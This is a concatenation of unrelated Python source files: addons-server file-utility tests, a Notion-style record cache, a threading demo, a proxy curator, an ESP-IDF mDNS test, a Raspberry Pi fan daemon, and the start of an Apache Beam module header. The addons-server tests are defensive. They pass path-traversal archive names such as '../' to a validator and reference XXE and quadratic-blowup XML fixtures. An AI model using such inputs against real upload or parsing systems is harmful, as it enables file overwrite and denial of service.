'/foo/bar' + os.path.join(tempdir, 'dir1', 'foo2'),
'/foo/bar' + os.path.join(tempdir, 'foo1'),
]
def test_get_all_files_prefix_with_strip_prefix():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
    # strip_prefix combined with prefix replaces the tempdir prefix in each path.
result = utils.get_all_files(
tempdir, strip_prefix=tempdir, prefix='/foo/bar')
assert result == [
os.path.join('/foo', 'bar', 'dir1'),
os.path.join('/foo', 'bar', 'dir1', 'foo2'),
os.path.join('/foo', 'bar', 'foo1'),
]
def test_lock_with_lock_attained():
with utils.lock(settings.TMP_PATH, 'test-lock-lock2') as lock_attained:
assert lock_attained
@contextlib.contextmanager
def _run_lock_holding_process(lock_name, sleep):
def _other_process_holding_lock():
with utils.lock(settings.TMP_PATH, lock_name) as lock_attained:
assert lock_attained
time.sleep(sleep)
other_process = multiprocessing.Process(target=_other_process_holding_lock)
other_process.start()
# Give the process some time to acquire the lock
time.sleep(0.2)
yield other_process
other_process.join()
def test_lock_timeout():
with _run_lock_holding_process('test-lock-lock3', sleep=2):
# Waiting for 3 seconds allows us to attain the lock from the parent
# process.
lock = utils.lock(settings.TMP_PATH, 'test-lock-lock3', timeout=3)
with lock as lock_attained:
assert lock_attained
with _run_lock_holding_process('test-lock-lock3', sleep=2):
# Waiting only 1 second fails to acquire the lock
lock = utils.lock(settings.TMP_PATH, 'test-lock-lock3', timeout=1)
with lock as lock_attained:
assert not lock_attained
def test_parse_search_empty_shortname():
from olympia.files.tests.test_file_viewer import get_file
fname = get_file('search_empty_shortname.xml')
with pytest.raises(forms.ValidationError) as excinfo:
utils.parse_search(fname)
assert (
str(excinfo.value.message) ==
'Could not parse uploaded file, missing or empty <ShortName> element')
class TestResolvei18nMessage(object):
def test_no_match(self):
assert utils.resolve_i18n_message('foo', {}, '') == 'foo'
def test_locale_found(self):
messages = {
'de': {
'foo': {'message': 'bar'}
}
}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'de')
assert result == 'bar'
def test_uses_default_locale(self):
messages = {
'en-US': {
'foo': {'message': 'bar'}
}
}
result = utils.resolve_i18n_message(
'__MSG_foo__', messages, 'de', 'en')
assert result == 'bar'
def test_no_locale_match(self):
        # Neither the requested locale nor the default locale is found, so the
        # message is returned unchanged.
messages = {
'fr': {
'foo': {'message': 'bar'}
}
}
result = utils.resolve_i18n_message(
'__MSG_foo__', messages, 'de', 'en')
assert result == '__MSG_foo__'
def test_field_not_set(self):
"""Make sure we don't fail on messages that are `None`
Fixes https://github.com/mozilla/addons-server/issues/3067
"""
result = utils.resolve_i18n_message(None, {}, 'de', 'en')
assert result is None
def test_field_no_string(self):
"""Make sure we don't fail on messages that are no strings"""
result = utils.resolve_i18n_message([], {}, 'de', 'en')
assert result == []
def test_corrects_locales(self):
messages = {
'en-US': {
'foo': {'message': 'bar'}
}
}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'en')
assert result == 'bar'
def test_ignore_wrong_format(self):
messages = {
'en-US': {
'foo': 'bar'
}
}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'en')
assert result == '__MSG_foo__'
class TestXMLVulnerabilities(TestCase):
"""Test a few known vulnerabilities to make sure
our defusedxml patching is applied automatically.
This doesn't replicate all defusedxml tests.
"""
def test_quadratic_xml(self):
quadratic_xml = os.path.join(
os.path.dirname(__file__), '..', 'fixtures', 'files',
'quadratic.xml')
with pytest.raises(forms.ValidationError) as exc:
utils.extract_search(quadratic_xml)
assert exc.value.message == u'OpenSearch: XML Security error.'
def test_general_entity_expansion_is_disabled(self):
zip_file = utils.SafeZip(os.path.join(
os.path.dirname(__file__), '..', 'fixtures', 'files',
'xxe-example-install.zip'))
# This asserts that the malicious install.rdf blows up with
# a parse error. If it gets as far as this specific parse error
# it means that the external entity was not processed.
#
# Before the patch in files/utils.py, this would raise an IOError
# from the test suite refusing to make an external HTTP request to
# the entity ref.
with pytest.raises(EntitiesForbidden):
utils.RDFExtractor(zip_file)
def test_lxml_XMLParser_no_resolve_entities(self):
with pytest.raises(NotSupportedError):
lxml.etree.XMLParser(resolve_entities=True)
# not setting it works
lxml.etree.XMLParser()
# Setting it explicitly to `False` is fine too.
lxml.etree.XMLParser(resolve_entities=False)
class TestGetBackgroundImages(TestCase):
file_obj = os.path.join(
settings.ROOT, 'src/olympia/devhub/tests/addons/static_theme.zip')
file_obj_dep = os.path.join(
settings.ROOT,
'src/olympia/devhub/tests/addons/static_theme_deprecated.zip')
def test_get_background_images(self):
data = {'images': {'theme_frame': 'weta.png'}}
images = utils.get_background_images(self.file_obj, data)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_deprecated(self):
data = {'images': {'headerURL': 'weta.png'}}
images = utils.get_background_images(self.file_obj_dep, data)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_images_no_theme_data_provided(self):
images = utils.get_background_images(self.file_obj, theme_data=None)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_images_missing(self):
data = {'images': {'theme_frame': 'missing_file.png'}}
images = utils.get_background_images(self.file_obj, data)
assert not images
def test_get_background_images_not_image(self):
self.file_obj = os.path.join(
settings.ROOT,
'src/olympia/devhub/tests/addons/static_theme_non_image.zip')
data = {'images': {'theme_frame': 'not_an_image.js'}}
images = utils.get_background_images(self.file_obj, data)
assert not images
def test_get_background_images_with_additional_imgs(self):
self.file_obj = os.path.join(
settings.ROOT,
'src/olympia/devhub/tests/addons/static_theme_tiled.zip')
data = {'images': {
'theme_frame': 'empty.png',
'additional_backgrounds': [
'transparent.gif', 'missing_&_ignored.png',
'weta_for_tiling.png']
}}
images = utils.get_background_images(self.file_obj, data)
assert len(images.items()) == 3
assert len(images['empty.png']) == 332
assert len(images['transparent.gif']) == 42
assert len(images['weta_for_tiling.png']) == 93371
# And again but only with the header image
images = utils.get_background_images(
self.file_obj, data, header_only=True)
assert len(images.items()) == 1
assert len(images['empty.png']) == 332
@pytest.mark.parametrize('value, expected', [
(1, '1/1/1'),
(12, '2/12/12'),
(123, '3/23/123'),
(123456789, '9/89/123456789'),
])
def test_id_to_path(value, expected):
assert utils.id_to_path(value) == expected
class TestSafeZip(TestCase):
def test_raises_error_for_invalid_webextension_xpi(self):
with pytest.raises(forms.ValidationError):
utils.SafeZip(get_addon_file('invalid_webextension.xpi'))
def test_raises_validation_error_when_uncompressed_size_is_too_large(self):
with override_settings(MAX_ZIP_UNCOMPRESSED_SIZE=1000):
with pytest.raises(forms.ValidationError):
# total uncompressed size of this xpi is: 2269 bytes
utils.SafeZip(get_addon_file(
'valid_firefox_and_thunderbird_addon.xpi'))
class TestArchiveMemberValidator(TestCase):
# We cannot easily test `archive_member_validator` so let's test
# `_validate_archive_member_name_and_size` instead.
def test_raises_when_filename_is_none(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size(None, 123)
def test_raises_when_filesize_is_none(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('filename', None)
def test_raises_when_filename_is_dot_dot_slash(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('../', 123)
def test_raises_when_filename_starts_with_slash(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('/..', 123)
def test_raises_when_filename_is_dot_dot(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('..', 123)
def test_does_not_raise_when_filename_is_dot_dot_extension(self):
utils._validate_archive_member_name_and_size('foo..svg', 123)
@override_settings(FILE_UNZIP_SIZE_LIMIT=100)
def test_raises_when_filesize_is_above_limit(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size(
'filename',
settings.FILE_UNZIP_SIZE_LIMIT + 100
)
|
store.py
|
import datetime
import json
import threading
import uuid
from collections import defaultdict
from copy import deepcopy
from dictdiffer import diff
from inspect import signature
from multiprocessing import Lock
from pathlib import Path
from tzlocal import get_localzone
from .logger import logger
from .settings import CACHE_DIR
from .utils import extract_id
class MissingClass(object):
def __bool__(self):
return False
Missing = MissingClass()
class Callback(object):
def __init__(self, callback, record, callback_id=None, extra_kwargs={}, watch_children=True):
self.callback = callback
self.record = record
self.callback_id = callback_id or str(uuid.uuid4())
self.extra_kwargs = extra_kwargs
def __call__(self, difference, old_val, new_val):
kwargs = {}
kwargs.update(self.extra_kwargs)
kwargs["record"] = self.record
kwargs["callback_id"] = self.callback_id
kwargs["difference"] = difference
kwargs["changes"] = self.record._convert_diff_to_changelist(difference, old_val, new_val)
logger.debug("Firing callback {} with kwargs: {}".format(self.callback, kwargs))
# trim down the parameters we'll be passing, to include only those the callback will accept
params = signature(self.callback).parameters
if not any(["**" in str(param) for param in params.values()]):
# there's no "**kwargs" in the callback signature, so remove any unaccepted params
for arg in list(kwargs.keys()):
if arg not in params:
del kwargs[arg]
# perform the callback, gracefully handling any exceptions
try:
# trigger the callback within its own thread, so it won't block others if it's long-running
threading.Thread(target=self.callback, kwargs=kwargs, daemon=True).start()
except Exception as e:
logger.error("Error while processing callback for {}: {}".format(repr(self.record), repr(e)))
def __eq__(self, val):
if isinstance(val, str):
return self.callback_id.startswith(val)
elif isinstance(val, Callback):
return self.callback_id == val.callback_id
else:
return False
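# Illustrative sketch (not part of the original module): Callback.__call__ inspects the
# handler's signature and only passes the keyword arguments the handler declares, so a
# handler may accept any subset of record / callback_id / difference / changes (or use
# **kwargs to receive everything). The handler below is hypothetical.
def _example_change_handler(record, changes):
    # Only "record" and "changes" are declared here, so the other kwargs are dropped
    # before the callback is dispatched on its own daemon thread.
    logger.debug("Example handler: {} changed, changes={}".format(repr(record), changes))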
class RecordStore(object):
def __init__(self, client, cache_key=None):
self._mutex = Lock()
self._client = client
self._cache_key = cache_key or str(int(datetime.datetime.now().timestamp() * 1000))
self._values = defaultdict(lambda: defaultdict(dict))
self._role = defaultdict(lambda: defaultdict(str))
self._collection_row_ids = {}
self._callbacks = defaultdict(lambda: defaultdict(list))
self._records_to_refresh = {}
self._pages_to_refresh = []
with self._mutex:
self._load_cache()
def _get(self, table, id):
return self._values[table].get(id, Missing)
def add_callback(self, record, callback, callback_id=None, extra_kwargs={}):
assert callable(callback), "The callback must be a 'callable' object, such as a function."
self.remove_callbacks(record._table, record.id, callback_id)
callback_obj = Callback(callback, record, callback_id=callback_id, extra_kwargs=extra_kwargs)
self._callbacks[record._table][record.id].append(callback_obj)
return callback_obj
def remove_callbacks(self, table, id, callback_or_callback_id_prefix=""):
"""
Remove all callbacks for the record specified by `table` and `id` that have a callback_id
starting with the string `callback_or_callback_id_prefix`, or are equal to the provided callback.
"""
if callback_or_callback_id_prefix is None:
return
callbacks = self._callbacks[table][id]
while callback_or_callback_id_prefix in callbacks:
callbacks.remove(callback_or_callback_id_prefix)
def _get_cache_path(self, attribute):
return str(Path(CACHE_DIR).joinpath("{}{}.json".format(self._cache_key, attribute)))
def _load_cache(self, attributes=("_values", "_role", "_collection_row_ids")):
for attr in attributes:
try:
with open(self._get_cache_path(attr)) as f:
if attr == "_collection_row_ids":
self._collection_row_ids.update(json.load(f))
else:
for k, v in json.load(f).items():
getattr(self, attr)[k].update(v)
except (FileNotFoundError, ValueError):
pass
def set_collection_rows(self, collection_id, row_ids):
if collection_id in self._collection_row_ids:
old_ids = set(self._collection_row_ids[collection_id])
new_ids = set(row_ids)
added = new_ids - old_ids
removed = old_ids - new_ids
for id in added:
self._trigger_callbacks("collection", collection_id, [("row_added", "rows", id)], old_ids, new_ids)
for id in removed:
self._trigger_callbacks("collection", collection_id, [("row_removed", "rows", id)], old_ids, new_ids)
self._collection_row_ids[collection_id] = row_ids
self._save_cache("_collection_row_ids")
def get_collection_rows(self, collection_id):
return self._collection_row_ids.get(collection_id, [])
def _save_cache(self, attribute):
with open(self._get_cache_path(attribute), "w") as f:
json.dump(getattr(self, attribute), f)
def _trigger_callbacks(self, table, id, difference, old_val, new_val):
for callback_obj in self._callbacks[table][id]:
callback_obj(difference, old_val, new_val)
def get_role(self, table, id, force_refresh=False):
self.get(table, id, force_refresh=force_refresh)
return self._role[table].get(id, None)
def get(self, table, id, force_refresh=False):
id = extract_id(id)
# look up the record in the current local dataset
result = self._get(table, id)
# if it's not found, try refreshing the record from the server
if result is Missing or force_refresh:
if table == "block":
self.call_load_page_chunk(id)
else:
self.call_get_record_values(**{table: id})
result = self._get(table, id)
return result if result is not Missing else None
def _update_record(self, table, id, value=None, role=None):
callback_queue = []
with self._mutex:
if role:
logger.debug("Updating 'role' for {}/{} to {}".format(table, id, role))
self._role[table][id] = role
self._save_cache("_role")
if value:
logger.debug("Updating 'value' for {}/{} to {}".format(table, id, value))
old_val = self._values[table][id]
difference = list(diff(old_val, value, ignore=["version", "last_edited_time", "last_edited_by"], expand=True))
self._values[table][id] = value
self._save_cache("_values")
if old_val and difference:
logger.debug("Value changed! Difference: {}".format(difference))
callback_queue.append((table, id, difference, old_val, value))
# run callbacks outside the mutex to avoid lockups
for cb in callback_queue:
self._trigger_callbacks(*cb)
def call_get_record_values(self, **kwargs):
"""
Call the server's getRecordValues endpoint to update the local record store. The keyword arguments map
table names into lists of (or singular) record IDs to load for that table. Use True to refresh all known
records for that table.
"""
requestlist = []
for table, ids in kwargs.items():
# ensure "ids" is a proper list
if ids is True:
ids = list(self._values.get(table, {}).keys())
if isinstance(ids, str):
ids = [ids]
# if we're in a transaction, add the requested IDs to a queue to refresh when the transaction completes
if self._client.in_transaction():
self._records_to_refresh[table] = list(set(self._records_to_refresh.get(table, []) + ids))
continue
requestlist += [{"table": table, "id": extract_id(id)} for id in ids]
if requestlist:
logger.debug("Calling 'getRecordValues' endpoint for requests: {}".format(requestlist))
results = self._client.post("getRecordValues", {"requests": requestlist}).json()["results"]
for request, result in zip(requestlist, results):
self._update_record(request["table"], request["id"], value=result.get("value"), role=result.get("role"))
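    # Illustrative sketch (not part of the original module): how the keyword-argument
    # mapping documented above is typically used. The IDs are hypothetical placeholders;
    # "block" and "collection" are table names already used elsewhere in this store.
    def _example_get_record_values_usage(self):
        # A single ID and a list of IDs can be mixed; each becomes one entry in the
        # getRecordValues request list.
        self.call_get_record_values(block="<block-id>", collection=["<collection-id>"])
        # Passing True refreshes every record already cached locally for that table.
        self.call_get_record_values(collection=True)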
def get_current_version(self, table, id):
values = self._get(table, id)
if values and "version" in values:
return values["version"]
else:
return -1
def call_load_page_chunk(self, page_id):
if self._client.in_transaction():
self._pages_to_refresh.append(page_id)
return
data = {"pageId": page_id, "limit": 100000, "cursor": {"stack": []}, "chunkNumber": 0, "verticalColumns": False}
recordmap = self._client.post("loadPageChunk", data).json()["recordMap"]
self.store_recordmap(recordmap)
def store_recordmap(self, recordmap):
for table, records in recordmap.items():
for id, record in records.items():
self._update_record(table, id, value=record.get("value"), role=record.get("role"))
def call_query_collection(self, collection_id, collection_view_id, search="", type="table", aggregate=[], filter=[], filter_operator="and", sort=[], calendar_by="", group_by=""):
# convert singletons into lists if needed
if isinstance(aggregate, dict):
aggregate = [aggregate]
if isinstance(filter, dict):
filter = [filter]
if isinstance(sort, dict):
sort = [sort]
data = {
"collectionId": collection_id,
"collectionViewId": collection_view_id,
"loader": {
"limit": 10000,
"loadContentCover": True,
"query": search,
"userLocale": "en",
"userTimeZone": str(get_localzone()),
"type": type,
},
"query": {
"aggregate": aggregate,
"filter": filter,
"filter_operator": filter_operator,
"sort": sort,
}
}
response = self._client.post("queryCollection", data).json()
self.store_recordmap(response["recordMap"])
return response["result"]
def handle_post_transaction_refreshing(self):
for block_id in self._pages_to_refresh:
self.call_load_page_chunk(block_id)
self._pages_to_refresh = []
self.call_get_record_values(**self._records_to_refresh)
self._records_to_refresh = {}
def run_local_operations(self, operations):
"""
Called to simulate the results of running the operations on the server, to keep the record store in sync
even when we haven't completed a refresh (or we did a refresh but the database hadn't actually updated yet...)
"""
for operation in operations:
self.run_local_operation(**operation)
def run_local_operation(self, table, id, path, command, args):
with self._mutex:
path = deepcopy(path)
new_val = deepcopy(self._values[table][id])
ref = new_val
# loop and descend down the path until it's consumed, or if we're doing a "set", there's one key left
while (len(path) > 1) or (path and command != "set"):
comp = path.pop(0)
if comp not in ref:
ref[comp] = [] if "list" in command else {}
ref = ref[comp]
if command == "update":
assert isinstance(ref, dict)
ref.update(args)
elif command == "set":
assert isinstance(ref, dict)
if path:
ref[path[0]] = args
else:
# this is the case of "setting the top level" (i.e. creating a record)
ref.clear()
ref.update(args)
elif command == "listAfter":
assert isinstance(ref, list)
if "after" in args:
ref.insert(ref.index(args["after"]) + 1, args["id"])
else:
ref.append(args["id"])
elif command == "listBefore":
assert isinstance(ref, list)
if "before" in args:
ref.insert(ref.index(args["before"]), args["id"])
else:
ref.insert(0, args["id"])
elif command == "listRemove":
try:
ref.remove(args["id"])
except ValueError:
pass
self._update_record(table, id, value=new_val)
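# Illustrative sketch (not part of the original module): the shape of the operation
# dicts consumed by run_local_operations()/run_local_operation() above. The table name,
# record id, paths and args are hypothetical placeholders.
def _example_local_operations(store):
    store.run_local_operations([
        # "update" merges args into the dict found at the given path.
        {"table": "block", "id": "<block-id>", "path": ["properties"],
         "command": "update", "args": {"title": [["Hello"]]}},
        # "listRemove" removes an id from the list at the given path, if present.
        {"table": "block", "id": "<block-id>", "path": ["content"],
         "command": "listRemove", "args": {"id": "<child-block-id>"}},
    ])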
|
threadLocal.py
|
# -*- coding: utf-8 -*-
import threading
local_school = threading.local()
def process_student():
    print('Hello, %s (in %s)' % (local_school.student, threading.current_thread().name))
def process_thread(name):
local_school.student = name
process_student()
t1 = threading.Thread(target=process_thread, args=('Alice', ), name='Thread-A')
t2 = threading.Thread(target=process_thread, args=('Bob', ), name='Thread-B')
t1.start()
t2.start()
t1.join()
t2.join()
|
letmecrawl.py
|
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from six import with_metaclass
import json
import time
import logging
import threading
import pkg_resources
from .sources import Source
from .models import OrderedTable, Singleton
from random import shuffle
logger = logging.getLogger(__name__)
CURATE_RELOAD_TIME = 5 * 60 # seconds
def letmecrawl():
for proxy in LMC().pop():
yield proxy
def stop():
LMC().stop()
def curate():
resource_package = __name__
sources = '/sources.json'
sources_path = pkg_resources.resource_filename(resource_package, sources)
with open(sources_path) as f:
sources = [Source.factory(s, u) for (s, u) in json.load(f).items()]
table = OrderedTable()
while table.alive():
all_sources = []
for s in sources:
all_sources.extend(s.list())
shuffle(all_sources)
for s in all_sources:
table.add(s)
        # TODO: parametrize sleep time
logger.debug('Current number of items #{}'.format(table.size()))
start = time.time()
while time.time() - start < CURATE_RELOAD_TIME and table.alive():
time.sleep(1)
class LMC(with_metaclass(Singleton, object)):
def __init__(self):
self.table = OrderedTable()
threading.Thread(target=curate).start()
def __iter__(self):
return self
def pop(self,
wait_rampup=True,
raise_exception=False):
while True:
try:
yield self.table.first()
except:
if raise_exception: raise
if wait_rampup: continue
yield None
def stop(self):
self.table.stop()
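# Illustrative sketch (not part of the original module): typical use of the
# letmecrawl() generator defined above. What is done with each proxy is hypothetical;
# the generator simply yields entries from the curated OrderedTable until stop()
# is called.
def _example_usage(max_proxies=3):
    for index, proxy in enumerate(letmecrawl()):
        logger.info('Got proxy: {}'.format(proxy))
        if index + 1 >= max_proxies:
            break
    # Shut down the background curate() thread once no more proxies are needed.
    stop()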
|
mdns_example_test.py
|
import re
import os
import sys
import socket
import time
import struct
import dpkt
import dpkt.dns
from threading import Thread, Event
# this is a test case write with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set environment variable `TEST_FW_PATH`,
# then get and insert `TEST_FW_PATH` to sys path before import FW module
try:
import IDF
except ImportError:
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
# g_run_server = True
# g_done = False
stop_mdns_server = Event()
esp_answered = Event()
def get_dns_query_for_esp(esp_host):
dns = dpkt.dns.DNS(b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01')
dns.qd[0].name = esp_host + u'.local'
print("Created query for esp host: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns(tester_host):
dns = dpkt.dns.DNS(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
dns.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = tester_host
arr.ip = socket.inet_aton('127.0.0.1')
    dns.an.append(arr)
print("Created answer to mdns query: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns_lwip(tester_host, id):
dns = dpkt.dns.DNS(b"\x5e\x39\x84\x00\x00\x01\x00\x01\x00\x00\x00\x00\x0a\x64\x61\x76\x69\x64"
b"\x2d\x63\x6f\x6d\x70\x05\x6c\x6f\x63\x61\x6c\x00\x00\x01\x00\x01\xc0\x0c"
b"\x00\x01\x00\x01\x00\x00\x00\x0a\x00\x04\xc0\xa8\x0a\x6c")
dns.qd[0].name = tester_host
dns.an[0].name = tester_host
dns.an[0].ip = socket.inet_aton('127.0.0.1')
dns.an[0].rdata = socket.inet_aton('127.0.0.1')
dns.id = id
print("Created answer to mdns (lwip) query: {} ".format(dns.__repr__()))
return dns.pack()
def mdns_server(esp_host):
global esp_answered
UDP_IP = "0.0.0.0"
UDP_PORT = 5353
MCAST_GRP = '224.0.0.251'
TESTER_NAME = u'tinytester.local'
TESTER_NAME_LWIP = u'tinytester-lwip.local'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sock.bind((UDP_IP,UDP_PORT))
mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
sock.settimeout(30)
while not stop_mdns_server.is_set():
try:
if not esp_answered.is_set():
sock.sendto(get_dns_query_for_esp(esp_host), (MCAST_GRP,UDP_PORT))
time.sleep(0.2)
data, addr = sock.recvfrom(1024)
dns = dpkt.dns.DNS(data)
if len(dns.qd) > 0 and dns.qd[0].type == dpkt.dns.DNS_A:
if dns.qd[0].name == TESTER_NAME:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns(TESTER_NAME), (MCAST_GRP,UDP_PORT))
elif dns.qd[0].name == TESTER_NAME_LWIP:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns_lwip(TESTER_NAME_LWIP, dns.id), addr)
if len(dns.an) > 0 and dns.an[0].type == dpkt.dns.DNS_A:
if dns.an[0].name == esp_host + u'.local':
print("Received answer to esp32-mdns query: {}".format(dns.__repr__()))
esp_answered.set()
except socket.timeout:
break
except dpkt.UnpackError:
continue
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mdns(env, extra_data):
global stop_mdns_server
"""
steps: |
1. join AP + init mdns example
2. get the dut host name (and IP address)
3. check the mdns name is accessible
      4. check DUT output if mdns advertised host is resolved
"""
dut1 = env.get_dut("mdns-test", "examples/protocols/mdns")
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mdns-test.bin")
bin_size = os.path.getsize(binary_file)
IDF.log_performance("mdns-test_bin_size", "{}KB".format(bin_size // 1024))
IDF.check_performance("mdns-test_bin_size", bin_size // 1024)
# 1. start mdns application
dut1.start_app()
# 2. get the dut host name (and IP address)
specific_host = dut1.expect(re.compile(r"mdns hostname set to: \[([^\]]+)\]"), timeout=30)
specific_host = str(specific_host[0])
thread1 = Thread(target=mdns_server, args=(specific_host,))
thread1.start()
try:
dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
except DUT.ExpectTimeout:
stop_mdns_server.set()
thread1.join()
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
# 3. check the mdns name is accessible
if not esp_answered.wait(timeout=30):
raise ValueError('Test has failed: did not receive mdns answer within timeout')
    # 4. check DUT output if mdns advertised host is resolved
try:
dut1.expect(re.compile(r"mdns-test: Query A: tinytester.local resolved to: 127.0.0.1"), timeout=30)
dut1.expect(re.compile(r"mdns-test: gethostbyname: tinytester-lwip.local resolved to: 127.0.0.1"), timeout=30)
dut1.expect(re.compile(r"mdns-test: getaddrinfo: tinytester-lwip.local resolved to: 127.0.0.1"), timeout=30)
finally:
stop_mdns_server.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mdns()
|
argononed.py
|
#!/usr/bin/python3
import smbus
import RPi.GPIO as GPIO
import os
import sys
import time
import psutil
import json
import subprocess
from threading import Thread
import paho.mqtt.client as mqtt
import yaml
rev = GPIO.RPI_REVISION
if rev == 2 or rev == 3:
bus = smbus.SMBus(1)
else:
bus = smbus.SMBus(0)
MQTT_CLIENT = os.uname()[1] + "_stats"
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
shutdown_pin=4
GPIO.setup(shutdown_pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
class Config:
def __init__(self, configfile):
defaultfan = [{65: 100}, {60: 55}, {55: 10}]
with open(configfile) as file:
self._config = yaml.load(file, Loader=yaml.FullLoader)
mqtt = self._config.get('mqtt', {})
self._server = mqtt.get('server', 'localhost')
self._port = mqtt.get('port', 1883)
self._topic = mqtt.get('topic', 'homeassistant/status/%%hostname%%')
self._topic = self._topic.replace('%%hostname%%', os.uname()[1].lower())
self._temps = self._config.get('fan', defaultfan)
try:
self._temps.sort(reverse=True, key=lambda x: (list(x.keys()))[0])
for s in self._temps:
int(s[list(s.keys())[0]])
except:
            print(f'Fan values are invalid: {sys.exc_info()[1]} - using defaults')
self._temps = defaultfan
self._temps.sort(reverse=True, key=lambda x: (list(x.keys()))[0])
self._lowtemp = list(self._temps[len(self._temps) - 1].keys())[0]
def get_topic(self):
return self._topic
def get_port(self):
return self._port
def get_server(self):
return self._server
def get_speed(self, temp):
if temp < self._lowtemp:
return 0
for s in self._temps:
if temp >= list(s.keys())[0]:
return s[list(s.keys())[0]]
return 0
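# Illustrative sketch (not part of the original script): Config.get_speed walks the
# temperature thresholds from hottest to coolest and returns the first matching speed,
# or 0 below the lowest threshold. With the default table [{65: 100}, {60: 55}, {55: 10}]
# that gives 70C -> 100, 62C -> 55, 57C -> 10 and 50C -> 0. The config path is the same
# one used by temp_check(); a real config file may map temperatures differently.
def _example_fan_curve():
    config = Config("/etc/argond_config.yaml")
    for temp in (70, 62, 57, 50):
        print("{}C -> fan speed {}".format(temp, config.get_speed(temp)))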
def shutdown_check():
while True:
pulsetime = 1
GPIO.wait_for_edge(shutdown_pin, GPIO.RISING)
time.sleep(0.01)
while GPIO.input(shutdown_pin) == GPIO.HIGH:
time.sleep(0.01)
pulsetime += 1
        # A short pulse from the power-button controller requests a reboot;
        # a longer pulse requests a full shutdown.
        if 2 <= pulsetime <= 3:
            os.system("reboot")
        elif 4 <= pulsetime <= 5:
            os.system("shutdown now -h")
def get_readings():
readings = {
"gputemp": 0,
"cputemp": 0,
"useddisk": 0,
"usedmem": 0,
"cpuperc": 0
}
response = subprocess.run(['/opt/vc/bin/vcgencmd', 'measure_temp'], stdout=subprocess.PIPE)
if response.returncode != 0:
readings["gputemp"] = 0
else:
readings["gputemp"] = float(str(response.stdout, 'utf-8')[5 : -3])
readings["useddisk"] = psutil.disk_usage('/').percent
readings["usedmem"] = psutil.virtual_memory().percent
readings["cpuperc"] = psutil.cpu_percent()
return readings
def temp_check():
fanconfig = Config("/etc/argond_config.yaml")
client = mqtt.Client(MQTT_CLIENT)
client.loop_start()
try:
client.connect(fanconfig.get_server(), fanconfig.get_port())
except:
print(f'Failed to connect to MQTT server: {sys.exc_info()[1]}')
readings = {}
address=0x1a
prevblock=0
while True:
readings = get_readings()
try:
tempfp = open("/sys/class/thermal/thermal_zone0/temp", "r")
temp = tempfp.readline()
tempfp.close()
val = float(int(temp)/1000)
except IOError:
val = 0
readings["cputemp"] = val
block = fanconfig.get_speed(val)
if block < prevblock:
time.sleep(30)
prevblock = block
try:
bus.write_byte(address, block)
except IOError:
temp=""
readings["fanspeed"] = block
if client.is_connected():
client.publish(fanconfig.get_topic(), json.dumps(readings))
time.sleep(30)
try:
    t1 = Thread(target=shutdown_check)
    t2 = Thread(target=temp_check)
    t1.start()
    t2.start()
except Exception:
    # threading.Thread objects have no stop() method, so on a startup failure
    # just release the GPIO pins before exiting.
    GPIO.cleanup()
|
local_job_service.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from __future__ import absolute_import
import concurrent.futures
import logging
import os
import queue
import shutil
import subprocess
import tempfile
import threading
import time
import traceback
from builtins import object
from typing import TYPE_CHECKING
from typing import List
from typing import Optional
import grpc
from google.protobuf import text_format # type: ignore # not in typeshed
